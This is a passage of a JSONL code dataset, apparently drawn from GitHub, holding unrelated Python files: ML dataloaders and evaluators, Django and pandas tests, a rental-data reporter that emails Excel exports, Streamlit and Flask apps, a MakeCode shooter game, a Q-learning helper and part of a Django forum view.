outputs.last_hidden_state\n    batch_outputs = torch.stack([torch.tensor(x[\"label\"]) for x in batch])\n    return batch_inputs, batch_outputs\n\n\ndef get_dataloader_and_vocab(batch_size, split):\n    tokenizer = AutoTokenizer.from_pretrained(\"distilbert-base-uncased\")\n    dataset = load_dataset(\"rotten_tomatoes\", split=split)\n    encoded_dataset = dataset.map(lambda batch: tokenizer(batch[\"text\"], padding=True, truncation=True), batched=True, batch_size=None)\n\n    dataloader = DataLoader(encoded_dataset, batch_size=batch_size, shuffle=True, collate_fn=collate_fn)\n    vocab = tokenizer.get_vocab()\n\n    return dataloader, vocab\n\n\nif __name__ == \"__main__\":\n    train_dataloader, vocab = get_dataloader_and_vocab(64, \"train\")\n    batch_inputs, batch_outputs = next(iter(train_dataloader))\n    print(batch_inputs.shape, batch_outputs.shape)\n","repo_name":"benjaminpodmore/nlp","sub_path":"RNN/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"28297135767","text":"from features import scan\nfrom data import Data\nfrom random import choice\nfrom utils import draw_bar\n\nfrom typing import List\n\n\ndef evaluate(data: Data, prediction: str, example: bool = False) -> None:\n    \"\"\"\n    Evaluate data object on provided prediction prolix tag sequence.\n    \"\"\"\n\n    if len(data.trueTokenization) != len(prediction):\n        raise Exception(\n            f'True data length ({len(data.trueTokenization)}) does not match prediction length ({len(prediction)})'\n        )\n\n    wTP = 0\n    wFP = 0\n    wTN = 0\n    wFN = 0\n\n    indexFP = []\n    indexFN = []\n\n    POSITIVE = {'W', 'B'}\n    NEGATIVE = {'N', 'S'}\n    for i, (trueTag, predTag) in enumerate(zip(data.trueTokenization, prediction)):\n        if trueTag in NEGATIVE and predTag in NEGATIVE:\n            wTN += 1\n        elif trueTag in POSITIVE and predTag in POSITIVE:\n            wTP += 1\n        elif trueTag in POSITIVE and predTag in NEGATIVE:\n            wFN += 1\n            indexFN.append(i)\n        elif trueTag in NEGATIVE and predTag in POSITIVE:\n            wFP += 1\n            indexFP.append(i)\n\n    def safeDiv(x: float, y: float):\n        return x/y if y != 0 else float('nan')\n\n    total = wTP + wFP + wTN + wFN\n    wTP = safeDiv(wTP, total)\n    wFP = safeDiv(wFP, total)\n    wTN = safeDiv(wTN, total)\n    wFN = safeDiv(wFN, total)\n\n    print('Any-level: ')\n    print(f'TP: {wTP*100:6.2f}%, FP: {wFP*100:6.2f}%')\n    print(f'FN: {wFN*100:6.2f}%, TN: {wTN*100:6.2f}%')\n    print(f'Precision: {wTP/(wTP+wFP)*100:6.2f}%')\n    print(f'Recall: {wTP/(wTP+wFN)*100:6.2f}%')\n\n    if example:\n        show_sample(data, prediction, indexFN, indexFP)\n\n    draw_bar()\n\n\ndef show_sample(data: Data, prediction: str, indexFN: List[int], indexFP: List[int], window: int = 20) -> None:\n    if indexFP or indexFN:\n        print()\n    if indexFN:\n        index = choice(indexFN)\n        print('False Negative example')\n        print(data.all[index-window:index+window], sep='')\n        print(prediction[index-window:index+window], sep='')\n    if indexFP:\n        index = choice(indexFP)\n        print('False Positive example')\n        print(data.all[index-window:index+window], sep='')\n        print(prediction[index-window:index+window], sep='')\n\n\ndef decode(data: Data, prediction: str) -> str:\n    \"\"\"\n    Decode input string against predicted sequence\n    \"\"\"\n    out = []\n    buffer = ''\n    for tag, char in zip(prediction, data.all):\n        buffer += char\n        if tag in {'W', 'B'}:\n            out.append(buffer)\n            buffer = ''\n    # keep any trailing, unterminated chunk as a single token (not char by char)\n    if buffer:\n        out.append(buffer)\n    out = [x.strip() for x in out]\n    return '|' + '|'.join(out) + 
'|'\n","repo_name":"zouharvi/hmm-tokenizer","sub_path":"src/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19982448080","text":"#! /usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import unicode_literals\nimport logging\nimport unittest\nimport json\nfrom bs4 import BeautifulSoup\nfrom django.test import Client\n\nlogging.basicConfig(level=logging.INFO, format=\"%(message)s\")\n\n\nclass FetchAllExplanationsTest(unittest.TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def get_regions(self, document):\n resp = self.client.post(\n '/python/scan',\n data={'origin': 'www.test.com', 'document': document})\n regions = json.loads(resp.content)['regions']\n return regions\n\n def test_get_region(self):\n string = \" abs(2) \"\n regions = self.get_regions(string)\n\n self.assertEqual(len(regions), 1)\n r = regions[0]\n self.assertEqual(\n r['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r['start_index'], 0)\n self.assertEqual(r['end_index'], 2)\n self.assertIn(\n \"Return the absolute value of a number.\",\n BeautifulSoup(r['document']).text\n )\n\n def test_get_multiple_regions(self):\n string = \" abs(2)\\nlen('fdsjkfds')\\nbin(1) \"\n regions = self.get_regions(string)\n\n self.assertEqual(len(regions), 3)\n r0 = regions[0]\n self.assertEqual(\n r0['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r0['start_index'], 0)\n self.assertEqual(r0['end_index'], 2)\n self.assertIn(\n \"Return the absolute value of a number.\",\n BeautifulSoup(r0['document']).text\n )\n\n r1 = regions[1]\n self.assertEqual(\n r1['node'],\n 'HTML > BODY:nth-of-type(1) > CODE:nth-of-type(1)')\n self.assertEqual(r1['start_index'], 7)\n self.assertEqual(r1['end_index'], 9)\n self.assertIn(\n \"Return the length (the number of items) of an object.\",\n BeautifulSoup(r1['document']).text\n )\n\n\nclass FetchExplanationForPlaintextTest(unittest.TestCase):\n\n def setUp(self):\n self.client = Client()\n\n def get_explanation(self, text):\n resp = self.client.post(\n '/python/explain',\n data={'origin': 'www.test.com', 'text': text})\n return resp.content\n\n def test_explain_python_builtin_from_plaintext(self):\n resp = self.get_explanation('zip')\n self.assertIn(\"This function returns a list of tuples,\", resp)\n\n def test_fail_to_explain_invalid_python_builtin_from_plaintext(self):\n resp = self.get_explanation('zip()')\n self.assertIn(\"'zip()' could not be explained as a python built-in.\", resp)\n","repo_name":"andrewhead/tutorons-server","sub_path":"tutorons/tests/python/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"} +{"seq_id":"14300387890","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 25 20:45:59 2021\n\n@author: RISHBANS\n\"\"\"\n\nimport pandas as pd\ntennis_data = pd.read_csv(\"tennis.csv\")\n\nfrom sklearn.preprocessing import OrdinalEncoder\nfrom sklearn.tree import DecisionTreeClassifier\n\no_e = OrdinalEncoder()\nX = tennis_data.drop(columns=['play'])\ny = tennis_data.play\n\nX = o_e.fit_transform(X)\n\ndt = DecisionTreeClassifier(criterion='entropy')\ndt.fit(X, 
y)\nprint(o_e.categories_)\n\ndt.predict([[1,0,1,0]])\n\n","repo_name":"edyoda/ML-with-Rishi","sub_path":"dt_tennis.py","file_name":"dt_tennis.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"36"} +{"seq_id":"32881100298","text":"# -*- coding: utf-8 -*-\n# Reporter: Send data email to recver.\n\nfrom module.mail.mail import Sender\nfrom module.database.db_opter import DBController\nfrom module.config.reporter import RPTerConfigReader\nfrom util.xlsx.writer import write_xlsx\nfrom util.common.date import Time\n\nimport os\nimport shutil\n\nclass Do():\n\n def __init__(self, rpt_name):\n self.rpt_name = rpt_name\n self.rpt_conf = RPTerConfigReader.rpter_config(rpt_name)\n self.db = DBController(rpt_name)\n\n def do(self):\n lj_path = self.data_from_db_lj\n qk_path = self.data_from_db_qk\n dk_path = self.data_from_db_dk\n zr_path = self.data_from_db_zr\n\n self.sender = Sender(\n msg = \"%s\\n数据采样时间:%s\"%(self.rpt_conf['recv']['recv_msg'], Time.now_date_str()),\n subject = \"%s => %s\"%(self.rpt_conf['recv']['recv_sub'], Time.now_date_str()),\n recvers = self.rpt_conf['recv']['recv_mail']\n )\n\n self.sender.add_attachment(*lj_path)\n self.sender.add_attachment(*qk_path)\n self.sender.add_attachment(*dk_path)\n self.sender.add_attachment(*zr_path)\n\n self.sender.send()\n\n\n def __data_from_db__(self, SQL, filename, sheetname, orderlist):\n RPT_PATH = \"./_output/{rpt}\".format(\n rpt = self.rpt_name\n )\n XLSX_PATH = \"{rpt}/{date}\".format(\n rpt = RPT_PATH,\n date = Time.now_date_str()\n )\n\n if not os.path.exists(RPT_PATH):\n os.mkdir(RPT_PATH)\n\n if not os.path.exists(XLSX_PATH):\n os.mkdir(XLSX_PATH)\n\n path = \"{xlsx}/{filename}.xlsx\".format(\n xlsx = XLSX_PATH,\n filename = sheetname\n )\n\n if os.path.exists(path):\n os.remove(path)\n\n self.db.execute(SQL)\n data = self.db.cur.fetchall()\n \n with write_xlsx(path, sheetname) as x:\n for d in data:\n x.write_dict(d, orderlist=orderlist)\n return filename, path\n\n @property\n def data_from_db_lj(self):\n '''data_from_db_lj\n Get Lianjia house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号',\n h.house_type_new as '房型', h.house_area as '房屋面积',\n h.house_price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', \n c.bd_detail as '详细地址'\n from\n house_base_infolj h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 1 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '链家信息采集'\n filename = 'LianjiaHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n\n @property\n def data_from_db_qk(self):\n '''data_from_db_qk\n Get Qingke house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号', '' as '房型',\n h.area as '房屋面积', h.price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', c.bd_detail as '详细地址'\n from\n house_base_infoqk h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 3 and \n h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '青客信息采集'\n filename = 'QingkeHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n 
]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n @property\n def data_from_db_dk(self):\n '''data_from_db_dk\n Get Danke house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号',\n h.house_type as '房型', h.area as '房屋面积',\n h.price as '租金', c.community_name as '小区名称',\n c.bd_district as '行政区', c.bd_busi as '商圈', \n c.bd_detail as '详细地址'\n from\n house_base_infodk h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 4 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> '' \n \"\"\"\n sheetname = '蛋壳信息采集'\n filename = 'DankeHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)\n\n @property\n def data_from_db_zr(self):\n '''data_from_db_zr\n Get Ziroom house info data from database.\n '''\n SQL = \"\"\"\n select\n h.house_id as '房源编号', h.community_id as '小区编号', h.house_type as '房型',\n h.area as '房屋面积', h.price as '租金', c.community_name as '小区名称', \n c.bd_district as '行政区', c.bd_busi as '商圈', c.bd_detail as '详细地址'\n from\n house_base_infozr h\n inner join community_info c on \n h.community_id = c.community_id and c.source_from = 2 and h.enabled = 1 \n and c.enabled = 1 and c.community_id <> '' and c.lat <> '' and c.lng <> ''\n and h.house_id <> ''\n \"\"\"\n sheetname = '自如信息采集'\n filename = 'ZiroomHouseInfo.xlsx'\n orderlist = [\n '房源编号', '小区编号', '房型', '房屋面积', '租金', '小区名称', '行政区', '商圈', '详细地址'\n ]\n return self.__data_from_db__(SQL, filename, sheetname, orderlist)","repo_name":"TauWu/template_crawler","sub_path":"do/reporter.py","file_name":"reporter.py","file_ext":"py","file_size_in_byte":6544,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"36"} +{"seq_id":"74365883622","text":"import data_frame_cli as cli\nimport pandas as pd\nimport numpy as np\n\ndef test_print_shape(capsys):\n\n expected_out = ['df.shape', 'test.csv', '(5, 2)']\n\n cli.print_shape('test.csv', pd.DataFrame(np.random.randn(5, 2)))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_info(capsys):\n\n expected_out = ['df.info', '5 non-null', 'int']\n\n cli.print_info(True, pd.DataFrame(np.random.randint(0, 10, size=(5, 2)),\n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_head(capsys):\n\n expected_out = ['df.head', '10', '40']\n\n cli.print_head(True, pd.DataFrame(data=[[10, 20], [30, 40]], \n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result\n\ndef test_print_describe_none_column(capsys):\n\n expected_out = ['describe', 'bla not found']\n\n cli.print_describe('bla', pd.DataFrame(data=[[10, 20], [30, 40]], \n columns=['col_a', 'col_b']))\n captured = capsys.readouterr()\n result = captured.out\n\n for element in expected_out:\n assert element in result","repo_name":"ryanwbaker/ensf311-a3-data-frame-cli","sub_path":"data_frame_cli_test.py","file_name":"data_frame_cli_test.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1189954750","text":"from __future__ import annotations\n\nimport pandas as pd\nimport streamlit as 
st\n\nfrom helpers import Data, Model, Scraper\n\nst.set_page_config(page_title='Real estate price estimation')\n\nst.write('Find out what a place would be worth?')\n\n# Setting up the session_state variables\nif 'scraper' not in st.session_state:\n st.session_state['scraper'] = Scraper()\n\nif 'model' not in st.session_state:\n st.session_state['model'] = Model.load_lgbm_pricing_model()\n\nscraper = st.session_state['scraper']\n\n# Searching for the desired place\nst.text_input(label='', value='78 avenue Raymond Poincaré', key='place')\nscraper.type_search(st.session_state['place'])\nscraper.search_place_with_url(scraper.get_suggestions()[0])\n\n# Retrieving the coordinates of the desired place\nlatitude, longitude = scraper.get_coordinates()\n\n# Load the data\nif 'df' not in st.session_state:\n # st.session_state['df'] = Data.load_df(explode=False)\n st.session_state['df'] = Data.load_data_for_lgbm()\n\n# Calculating the distance\ndf_distance = st.session_state['df'].pipe(Data.calculate_distance, latitude=latitude, longitude=longitude)\nmodel_data = df_distance.loc[[df_distance['distance'].argmin()], :].head(1).reset_index(drop=True)\n\n\ncolumns = st.columns(3)\n# Adding a metric with the price predictions for now\nwith columns[0]:\n current_price = st.session_state['model'].predict(model_data)[0]\n st.metric(label='Current price',\n value=f\"{current_price:,.{2}f} €\")\n# Adding a metric with the price predictions for in five years\nwith columns[1]:\n model_data_in_five_years = model_data.copy()\n model_data_in_five_years.loc[0, 'anneemut'] += 5\n price_in_five_years = st.session_state['model'].predict(model_data_in_five_years)[0]\n st.metric(label='Price in five years',\n value=f\"{price_in_five_years:,.{2}f} €\",\n delta=f'{(((price_in_five_years / current_price) - 1) * 100):,.{2}f} %')\n# Adding a metric with the money amount that could be expected if one invested current_price in an ECB bond\nwith columns[2]:\n ecb_five_year_equivalent = current_price * (1.02312) ** 5\n st.metric(label='ECB bond equivalent',\n value=f\"{ecb_five_year_equivalent:,.{2}f} €\",\n delta=f'{(((ecb_five_year_equivalent / current_price) - 1) * 100):,.{2}f} %')\n\n# Drawing the map\nst.map(pd.DataFrame({'lat': [latitude], 'lon': [longitude]}))\n","repo_name":"acktan/eleven-strategy","sub_path":"paris_pricer/Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"6621904027","text":"from flask import Flask,render_template,request,jsonify\nimport random\nfrom dicionario import conveersao,dividir_distancias,dic\nfrom tempera import iniciarr\nfrom subidaencosta import iniciar\nfrom subidaencosta2 import iniciars\nfrom ag_pcv import ag\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n \n return render_template(\"index.html\")\n\n@app.route(\"/\", methods=['POST'])\ndef post():\n #barrinha = request.form['barrinha']\n #print(barrinha)\n tp = request.form['tp']\n ng = request.form['ng']\n tc = request.form['tc']\n tm = request.form['tm']\n ig = request.form['ig']\n distanciaentre = request.form['distanciasi']\n nomes = request.form['nome']\n latitude = request.form['latitudelongitude']\n \n \n nome,numero,latitudee = conveersao(distanciaentre,nomes,latitude)\n\n n = dividir_distancias(numero)\n print(len(n))\n sequencia_atual = list(range(len(n)))\n random.shuffle(sequencia_atual)\n #cursoencosta,distanciaencosta,lat = iniciar(n,nome,latitudee,sequencia_atual)\n 
#cursoencosta2,distanciaencosta2,lat2 = iniciars(n,nome,latitudee,sequencia_atual)\n #cursotempera,distanciatempera,lon = iniciarr(n,nome,latitudee,sequencia_atual)\n p,lat = ag(n,len(n),int(tp),int(ng),float(tc),float(tm),float(ig),latitudee)\n print(p)\n print(lat)\n #for i in range(len(lat)):\n # muda = lat[i].replace(\",\",\"/\")\n # lat[i] = muda\n #for i in range(len(lon)):\n # muda = lon[i].replace(\",\",\"/\")\n # lon[i] = muda\n #for i in range(len(lat2)):\n # muda = lat2[i].replace(\",\",\"/\")\n # lat2[i] = muda\n \n return render_template(\"index.html\",distanciaencosta = p,lat=lat)\n #if barrinha==\"se\":\n # return render_template(\"index.html\",distanciaencosta =\"\\n Distancia Subida de Encosta:\"+str(distanciaencosta),cursoencosta =\"Curso Subida de encosta:\" +str(cursoencosta),lat=lat)\n #elif barrinha == \"se*\":\n # return render_template(\"index.html\",distanciaencosta2 =\"\\n Distancia Subida de Encosta*:\"+str(distanciaencosta2),cursoencosta2 =\"Curso Subida de encosta*:\" +str(cursoencosta2),lat2=lat2)\n #elif barrinha ==\"temp\":\n # return render_template(\"index.html\", distanciatempera = \"\\n Distancia Tempera:\"+str(distanciatempera),cursotempera =\"\\n Curso Tempera:\"+str(cursotempera),long = lon)\n #elif barrinha ==\"todas\":\n # return render_template(\"index.html\",distanciaencosta =\"\\n Distancia Subida de Encosta:\"+str(distanciaencosta),cursoencosta =\"Curso Subida de encosta:\" +str(cursoencosta),lat=lat,cursotempera = \"\\n Curso Tempera:\"+str(cursotempera),distanciatempera=\"\\n Distancia tempera:\"+str(distanciatempera),long = lon,distanciaencosta2 =\"\\n Distancia Subida de Encosta*:\"+str(distanciaencosta2),cursoencosta2 =\"Curso Subida de encosta*:\" +str(cursoencosta2),lat2=lat2)\n\n \n \nif __name__ == \"__main__\":\n app.run()\n\n\n\n\n","repo_name":"Igao2/BarRoute","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"36516820753","text":"import logging\n\nimport sbs.database_utility as db_util\nfrom sbs.models.TxMethod import TxMethod\nfrom sbs.utility import log_level\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(log_level)\n\n\ndef add_tx_method(params):\n \"\"\"\n Adds tx_method record or returns tx_method record if already exists\n \"\"\"\n method_name = params['tx_method']\n try:\n tx_method = TxMethod.query.filter_by(method_name=method_name) \\\n .one_or_none()\n\n if tx_method:\n logger.info(\"TxMethod with method name [{}] already exists.\"\n .format(method_name))\n return tx_method\n\n tx_method = TxMethod(method_name)\n db_util.db_add_query(tx_method)\n db_util.db_commit()\n logger.info(\"Transformation method record for method {} added successfully.\"\n .format(method_name))\n tx_method = TxMethod.query.filter_by(method_name=method_name) \\\n .one_or_none()\n except Exception as e:\n logger.error('An error occurred : {}'.format(str(e)))\n raise Exception('Failed to fetch Transformation method id for method '\n '[{}] with error {} '.format(method_name, e))\n\n return tx_method\n","repo_name":"rohitbs113/DupontSBS","sub_path":"sbs/service/tx_method_service.py","file_name":"tx_method_service.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"2281427634","text":"@namespace\nclass SpriteKind:\n Gas = SpriteKind.create()\n\ndef on_a_pressed():\n global darts, projectile\n darts = 
[assets.image(\"\"\"\n Dart1\n \"\"\"),\n assets.image(\"\"\"\n Dart2\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 5 1 1 1 1 5 \n 5 5 5 5 5 5 \n . . 5 5 . . \n . 5 . . 5 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 7 1 1 1 1 7 \n 7 7 7 7 7 7 \n . . 7 7 . . \n . 7 . . 7 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n 9 1 1 1 1 9 \n 9 9 9 9 9 9 \n . . 9 9 . . \n . 9 . . 9 .\n \"\"\"),\n img(\"\"\"\n . . 1 1 . . \n . . 1 1 . . \n a 1 1 1 1 a \n a a a a a a \n . . a a . . \n . a . . a .\n \"\"\")]\n projectile = sprites.create_projectile_from_sprite(darts._pick_random(), mySprite, 0, -150)\n projectile.start_effect(effects.warm_radial, 100)\ncontroller.A.on_event(ControllerButtonEvent.PRESSED, on_a_pressed)\n\ndef on_on_overlap(sprite, otherSprite):\n global enemySpeed\n sprite.destroy(effects.disintegrate, 500)\n otherSprite.destroy()\n info.change_score_by(1)\n if info.score() == 5:\n game.show_long_text(\"Ship Intercom: We forgot to tell you, your projectiles steal data from the ships before destroying them. And also, please don't get hit too many times, these ships are really expensive.\",\n DialogLayout.BOTTOM)\n if info.score() == 10:\n info.change_score_by(5)\n mySprite.say_text(\"+5 Level-Up Bonus\", 2000, False)\n statusbar2.value = 100\n enemySpeed = 70\n elif info.score() == 25:\n info.change_score_by(5)\n mySprite.say_text(\"+5 Level-Up Bonus\", 2000, False)\n statusbar2.value = 100\n enemySpeed = 90\n elif info.score() == 40:\n game.show_long_text(\"Congrats soldier, you saved the galaxy. Accept this reward of $700,000,000!\",\n DialogLayout.BOTTOM)\n info.change_score_by(700000000)\n game.over(True)\nsprites.on_overlap(SpriteKind.enemy, SpriteKind.projectile, on_on_overlap)\n\ndef on_on_zero(status):\n game.show_long_text(\"Ship Intercom: Come in soldier... soldier? I TOLD HIM THESE ARE EXPENSIVE AS CRAP.\",\n DialogLayout.BOTTOM)\n game.over(False)\nstatusbars.on_zero(StatusBarKind.health, on_on_zero)\n\ndef on_on_overlap2(sprite2, otherSprite2):\n statusbar.value = 100\n otherSprite2.destroy()\nsprites.on_overlap(SpriteKind.player, SpriteKind.Gas, on_on_overlap2)\n\ndef on_on_zero2(status2):\n game.show_long_text(\"Ship Intercom: *slaps face* You needed to grab the fuel. COME ON!\",\n DialogLayout.BOTTOM)\n game.over(False)\nstatusbars.on_zero(StatusBarKind.energy, on_on_zero2)\n\ndef on_on_overlap3(sprite3, otherSprite3):\n statusbar2.value += -20\n otherSprite3.destroy(effects.fire, 500)\n scene.camera_shake(4, 500)\nsprites.on_overlap(SpriteKind.player, SpriteKind.enemy, on_on_overlap3)\n\nmyEnemy: Sprite = None\nmyFuel: Sprite = None\nprojectile: Sprite = None\ndarts: List[Image] = []\nstatusbar2: StatusBarSprite = None\nenemySpeed = 0\nstatusbar: StatusBarSprite = None\nmySprite: Sprite = None\ngame.splash(\"You feel a strange, cold breeze, and you are suddenly awoken by the President.\")\ngame.show_long_text(\"Mr. President: Hello, you've been selected to fight evil in the galaxy. 
Complete this mission for the chance to earn $700,000,000.\",\n DialogLayout.BOTTOM)\nscene.set_background_image(assets.image(\"\"\"\n Galaxy\n\"\"\"))\nscroller.scroll_background_with_speed(0, 10)\nmySprite = sprites.create(assets.image(\"\"\"\n Rocket\n\"\"\"), SpriteKind.player)\ncontroller.move_sprite(mySprite)\nmySprite.set_stay_in_screen(True)\nanimation.run_image_animation(mySprite,\n assets.animation(\"\"\"\n Flying Rocket\n \"\"\"),\n 100,\n True)\nstatusbar = statusbars.create(20, 4, StatusBarKind.energy)\nstatusbar.attach_to_sprite(mySprite, -30, 0)\nenemySpeed = 50\nstatusbar2 = statusbars.create(4, 20, StatusBarKind.health)\nstatusbar2.attach_to_sprite(mySprite, 0, 0)\nstatusbar.set_label(\"Gas\")\nstatusbar2.set_label(\"HP\")\n\ndef on_update_interval():\n global myFuel\n myFuel = sprites.create_projectile_from_side(assets.image(\"\"\"\n Fuel\n \"\"\"), 0, 80)\n myFuel.x = randint(5, 155)\n myFuel.set_kind(SpriteKind.Gas)\ngame.on_update_interval(5000, on_update_interval)\n\ndef on_update_interval2():\n global myEnemy\n myEnemy = sprites.create_projectile_from_side(assets.image(\"\"\"\n Spider\n \"\"\"), 0, enemySpeed)\n myEnemy.x = randint(5, 155)\n myEnemy.set_kind(SpriteKind.enemy)\n animation.run_image_animation(myEnemy,\n assets.animation(\"\"\"\n Flying Spider\n \"\"\"),\n 100,\n True)\ngame.on_update_interval(2000, on_update_interval2)\n\ndef on_update_interval3():\n statusbar.value += -1\ngame.on_update_interval(500, on_update_interval3)","repo_name":"pythongamerexe/space-wars","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"23621832376","text":"#!/usr/bin/env python3\n\"\"\" module \"\"\"\nimport numpy as np\n\n\ndef play(env, Q, max_steps=100):\n \"\"\"trained agent play an episode\"\"\"\n env.reset()\n state = 0\n env.render()\n for i in range(max_steps):\n action = np.argmax(Q[state, :])\n state, reward, done, _ = env.step(action)\n env.render()\n if done:\n break\n return reward\n","repo_name":"vandeldiegoc/holbertonschool-machine_learning","sub_path":"reinforcement_learning/0x00-q_learning/4-play.py","file_name":"4-play.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"29543563501","text":"import time\n\n\nsessions = {}\n\n\ndef find_or_create_session(id_):\n \"\"\"\n This function returns the client session with Wit context included if one\n exists, or it returns a newly created session\n\n :param id_: A Facebook ID\n :return: str\n \"\"\"\n new_session = False\n session_id = \"\"\n\n # search the global sessions for the given Facebook ID\n for key in sessions.iterkeys():\n if sessions[key][\"id\"] == id_:\n session_id += key\n\n # if no session exists, let's create one\n if session_id is \"\":\n new_session = True\n # the session is created by taking th current epoch time in seconds,\n # and concatenating the given Facebook ID\n session_id += str(int(time.time())) + id_\n sessions[session_id] = {\n \"id\": id_,\n \"context\": {}\n }\n\n return session_id, new_session\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"harrylewis/travel-assistant-bot","sub_path":"sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15317573724","text":"from 
django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_GET, require_POST\n\nfrom glass.forms import UserForm, TopicForm, MessageForm\nfrom glass.models import User, Tag, Topic, Message\n\n@require_GET\ndef index(request):\n    \"\"\"\n    Index page of the project.\n\n    The page presents list of popular topics ordered by default by number of\n    “likes”. Pagination, search.\n    \"\"\"\n    page_size = request.GET.get('page_size', 5)\n    page = request.GET.get('page', 1)\n    tag = request.GET.get('tag')\n    search = request.GET.get('search')\n    tm = Topic.objects\n    topics = tm.filter(tags__in=[tag]) if tag else tm.all()\n    if search:\n        topics = topics.filter(title__contains=search)\n    # FIXME The following processing logic assumes that relatively small\n    # (maybe a few hundreds) number of topics is returned by ‘topic’ query\n    # set. This may be *quite* slow if the data base contains lots of\n    # topics. If this is the case, we could add ‘initial_message’ foreign\n    # key field to ‘Topic’ model and use it to sort topics on data base\n    # level. Other solutions would involve lower level of interaction with\n    # the data base and thus may lock the application into using of\n    # particular back-end, which is often bad design.\n    topics = sorted(list(topics),\n                    key=lambda x: x.initial_message().likes(),\n                    reverse=True)\n    context = {}\n    if topics:\n        paginator = Paginator(topics, page_size)\n        num_pages = paginator.num_pages\n        try:\n            p = paginator.page(page)\n        except PageNotAnInteger:\n            p = paginator.page(1)\n        except EmptyPage:\n            p = paginator.page(num_pages)\n        context['page'] = p\n        # Range of page links to show, we should take care of situations\n        # when there are too many pages:\n        page_range = range(max(1, p.number - 4),\n                           min(num_pages, p.number + 4) + 1)\n        context['page_range'] = page_range\n        context['num_pages'] = num_pages\n    else:\n        context['page'] = None\n    return render(request, 'glass/index.html', context=context)\n\ndef about(request):\n    \"\"\"\n    About page, nothing special.\n    \"\"\"\n    return render(request, 'glass/about.html')\n\ndef topic(request, slug):\n    \"\"\"\n    Topic-dedicated page.\n\n    This displays all messages in order and allows registered users to post\n    new messages. This page features anchor links per message and ability to\n    edit or delete last posted message for its author. 
